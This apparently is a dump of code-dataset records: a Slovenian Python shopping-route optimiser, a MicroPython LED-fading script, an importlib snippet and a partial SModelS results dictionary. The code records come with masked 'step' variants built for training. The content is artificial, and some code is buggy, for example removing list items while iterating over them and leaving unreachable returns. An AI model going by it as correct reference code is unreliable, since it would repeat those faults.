    return poti[mini]  # [[path], length]
# Pick the overall shortest route across all valid shop combinations.
def doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):
    vozlisca = []
    dolzine = []
    trgovine = []
    for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):
        par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)
        if par is None:
            continue  # this combination has no reachable locations
        dolzine.append(par[1])
        vozlisca.append(par[0])
        trgovine.append(kombinacija)
    if dolzine == []:
        return None
    i = numpy.argmin(dolzine)
    v = vozlisca[i]
    v.append(dom)  # close the loop back home
    obiskane_trgovine = trgovine[i]
    return v, obiskane_trgovine
# Assign each basket item to one of the visited shops.
def razporeditev(obiskane_trgovine, izdelki, slovar):
    izdelki2 = izdelki.copy()
    razporeditev = []
    for trgovina in obiskane_trgovine:
        sez = []
        for izdelek in izdelki:
            if {izdelek}.issubset(slovar[trgovina]):
                izd = podatki.id_izdelka_v_opis()[izdelek - 1]
                sez.append(izd)
                izdelki2.remove(izdelek)
        razporeditev.append([trgovina, sez])
    return razporeditev
baza.commit()
slovar_koordinat = podatki.slovar_koordinat
kombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)
# print(kombinacije_trgovin)
pot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)
razpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)
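# Hypothetical inspection of the results (not part of the original script):
# 'pot' is the list of visited coordinates, starting and ending at 'dom', and
# 'razpredelnica' pairs every visited shop with the basket items to buy there.
#
#   print(pot)
#   print(razpredelnica)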
|
normal
|
{
"blob_id": "5a0702dd869862ebc27c83d10e0b1f0575de68a7",
"index": 2944,
"step-1": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\n<mask token>\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\n<mask token>\n",
"step-4": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin = ['spar', 'mercator', 'tus', 'hofer', 'lidl']\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f()\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, 
obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\nslovar_koordinat = podatki.slovar_koordinat\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici),\n seznam_trgovin, trgovine_z_izdelki)\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici,\n podatki.trgovine_z_izdelki)\n",
"step-5": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\n\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin =[\"spar\", \"mercator\", \"tus\", \"hofer\", \"lidl\"]\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f() #slovar: {'trgovina':['id1', 'id2'],...}\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n'''\ndef zemljevid_trgovin(trgovine):\n sez = []\n for trgovina in trgovine:\n sez.append([trgovina, [])\n\ndef kombinacije_trgovin(seznam_izdelkov):\n sez_kombinacij = []\n for trgovina in trgovine:\n kombinacija = []\n izdelki = sez_izdelkov\n for izdelek in izdelki:\n if izdelek in trgovina:\n izdelki = izdelki.remove(izdelek)\n'''\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):\n \n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek) #množica vseh izdelkov, ki jih lahko dobiš v danih trgovinah\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin) \n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija) \n return kombinacije\n \n \n return None\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)\n\n#dom = [x,y] \ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = [] #skupine vozlišč iste trgovine\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]: #skupine[0] je seznam lokacij ene vrste trgovin\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print(\"Nakupa ni mogoče opraviti.\")\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini] #[[pot], dolzina]\n \n\n \n return (dolzina, sez_vozlisc)\n\ndef 
doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek-1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n \nbaza.commit()\n\nslovar_koordinat = podatki.slovar_koordinat\n\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)\n#print(kombinacije_trgovin)'\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
from machine import Pin, PWM
import time
# external LED is connected to pin D1 (GPIO5)
PinNum = 5
# PWM initialisation
pwm1 = PWM(Pin(PinNum))
pwm1.freq(60)
pwm1.duty(0)
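# on an ESP8266 board the duty cycle ranges from 0 (off) to 1023 (fully on)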
step = 100
for i in range(10):
    # fade in
while step < 1000:
pwm1.duty(step)
time.sleep_ms(500)
step+=100
    # fade out
while step > 0:
pwm1.duty(step)
time.sleep_ms(500)
step-=200
# reset the PWM
pwm1.deinit()
|
normal
|
{
"blob_id": "9f31694d80f2dcc50a76b32aa296871694d3644d",
"index": 7838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npwm1.freq(60)\npwm1.duty(0)\n<mask token>\nfor i in range(10):\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step += 100\n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step -= 200\npwm1.deinit()\n",
"step-3": "<mask token>\nPinNum = 5\npwm1 = PWM(Pin(PinNum))\npwm1.freq(60)\npwm1.duty(0)\nstep = 100\nfor i in range(10):\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step += 100\n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step -= 200\npwm1.deinit()\n",
"step-4": "from machine import Pin, PWM\nimport time\nPinNum = 5\npwm1 = PWM(Pin(PinNum))\npwm1.freq(60)\npwm1.duty(0)\nstep = 100\nfor i in range(10):\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step += 100\n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step -= 200\npwm1.deinit()\n",
"step-5": "from machine import Pin, PWM\nimport time\n\n# externe LED zit op pin D1 (GPIO5)\nPinNum = 5\n\n# pwm initialisatie\npwm1 = PWM(Pin(PinNum))\npwm1.freq(60)\npwm1.duty(0)\n\nstep = 100\nfor i in range(10):\n # oplichten\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step+=100\n # uitdoven \n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step-=200\n\n# pwm resetten \npwm1.deinit()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import importlib
if __name__ == '__main__':
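    # load the UserFile module by name at runtime and read its module-level attributes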
module = importlib.import_module('UserFile')
print(module.if_new_message)
print(module.ID)
|
normal
|
{
"blob_id": "8a773448383a26610f4798e12fb514248e71dc4b",
"index": 698,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n module = importlib.import_module('UserFile')\n print(module.if_new_message)\n print(module.ID)\n",
"step-3": "import importlib\nif __name__ == '__main__':\n module = importlib.import_module('UserFile')\n print(module.if_new_message)\n print(module.ID)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
smodelsOutput = {'OutputStatus': {'sigmacut': 0.01, 'minmassgap': 5.0,
'maxcond': 0.2, 'ncpus': 1, 'file status': 1, 'decomposition status': 1,
'warnings': 'Input file ok', 'input file':
'inputFiles/scanExample/slha/100968509.slha', 'database version':
'1.2.0', 'smodels version': '1.2.0rc'}, 'ExptRes': [{'maxcond': 0.0,
'theory prediction (fb)': 728.7491431153657, 'upper limit (fb)':
44.22312638711652, 'expected upper limit (fb)': None, 'TxNames': ['T2'],
'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'CMS-SUS-16-033', 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0,
'lumi (fb-1)': 35.9, 'dataType': 'upperLimit', 'r': 16.478915053090216,
'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)':
728.7491431153657, 'upper limit (fb)': 55.74859999999999,
'expected upper limit (fb)': None, 'TxNames': ['T2'], 'Mass (GeV)': [[
541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-16-036',
'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,
'dataType': 'upperLimit', 'r': 13.072061775817971, 'r_expected': None},
{'maxcond': 0.0, 'theory prediction (fb)': 132.83976207255284,
'upper limit (fb)': 36.140272, 'expected upper limit (fb)': None,
'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],
'AnalysisID': 'CMS-SUS-13-019', 'DataSetID': None,
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5, 'dataType':
'upperLimit', 'r': 3.675671341725177, 'r_expected': None}, {'maxcond':
0.0, 'theory prediction (fb)': 0.9562482176560967, 'upper limit (fb)':
0.274, 'expected upper limit (fb)': 0.154, 'TxNames': ['T2', 'T5',
'TChiZZ'], 'Mass (GeV)': None, 'AnalysisID': 'CMS-SUS-13-012',
'DataSetID': '6NJet8_1250HT1500_450MHTinf', 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 19.5, 'dataType': 'efficiencyMap', 'r':
3.489956998744878, 'r_expected': 6.209404010753875, 'chi2':
13.063642260056689, 'likelihood': 6.008581252238334e-05}, {'maxcond':
0.0, 'theory prediction (fb)': 132.83976207255284, 'upper limit (fb)':
58.50226240000003, 'expected upper limit (fb)': None, 'TxNames': ['T2'],
'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'ATLAS-SUSY-2013-02', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 20.3, 'dataType': 'upperLimit', 'r': 2.270677348583237,
'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)':
9.084517413967422, 'upper limit (fb)': 4.2419,
'expected upper limit (fb)': 5.5524, 'TxNames': ['T2'], 'Mass (GeV)': [
[541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-02',
'DataSetID': 'SR2jm', 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,
'dataType': 'efficiencyMap', 'r': 2.141615175739037, 'r_expected':
1.6361424634333661, 'chi2': 11.844156696751806, 'likelihood':
3.1390377843658383e-07}, {'maxcond': 0.0, 'theory prediction (fb)':
132.83976207255284, 'upper limit (fb)': 67.69032800000002,
'expected upper limit (fb)': 67.79354400000003, 'TxNames': ['T2'],
'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'CMS-SUS-12-028', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 11.7, 'dataType': 'upperLimit', 'r': 1.9624629691933657,
'r_expected': 1.9594751097914693}, {'maxcond': 0.0,
'theory prediction (fb)': 0.7285976790027092, 'upper limit (fb)': 0.506,
'expected upper limit (fb)': 0.464, 'TxNames': ['T5'], 'Mass (GeV)': [[
881.8, 541.4, 57.4], [881.8, 541.4, 57.4]], 'AnalysisID':
'ATLAS-SUSY-2013-04', 'DataSetID': 'GtGrid_SR_7ej80_0bjet',
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'efficiencyMap', 'r': 1.4399163616654331, 'r_expected':
1.5702536185403213, 'chi2': 7.225026655774327, 'likelihood':
0.0005573265805884188}, {'maxcond': 0.0, 'theory prediction (fb)':
132.83976207255284, 'upper limit (fb)': 97.78847200000001,
'expected upper limit (fb)': 69.450736, 'TxNames': ['T2'], 'Mass (GeV)':
[[541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-13-012',
'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5,
'dataType': 'upperLimit', 'r': 1.358439899465377, 'r_expected':
1.9127192845379328}, {'maxcond': 0.0, 'theory prediction (fb)':
